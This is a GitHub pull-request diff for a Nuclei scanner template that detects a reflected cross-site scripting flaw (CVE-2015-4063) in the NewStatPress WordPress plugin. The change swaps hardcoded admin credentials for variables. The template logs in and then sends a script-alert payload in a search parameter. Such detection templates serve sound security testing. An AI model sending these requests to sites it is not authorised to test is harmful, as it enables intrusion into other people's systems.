Skip to content
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
6 changes: 3 additions & 3 deletions http/cves/2015/CVE-2015-4063.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -29,7 +29,7 @@ info:
vendor: newstatpress_project
product: newstatpress
framework: wordpress
tags: cve2015,cve,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm,newstatpress_project,vuln
tags: cve2015,cve,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm,newstatpress_project,vuln,authenticated

http:
- raw:
Expand All @@ -38,7 +38,8 @@ http:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

log=admin&pwd=admin123&wp-submit=Log+In
log={{username}}&pwd={{password}}&wp-submit=Log+In

- |
GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1
Host: {{Hostname}}
Expand All @@ -49,4 +50,3 @@ http:
- 'status_code_2 == 200'
- "contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'newstatpress')"
condition: and
# digest: 4a0a00473045022100ec711903b02cd3ab3974c61e7dfc82c8dd31b04041eca0185364699e7a3bc811022070f9c08ffd9a649179c39256fa14d80e632a2bb35da119fa757456935ee4fe45:922c64590222798bb761d5b6d8e72950
Loading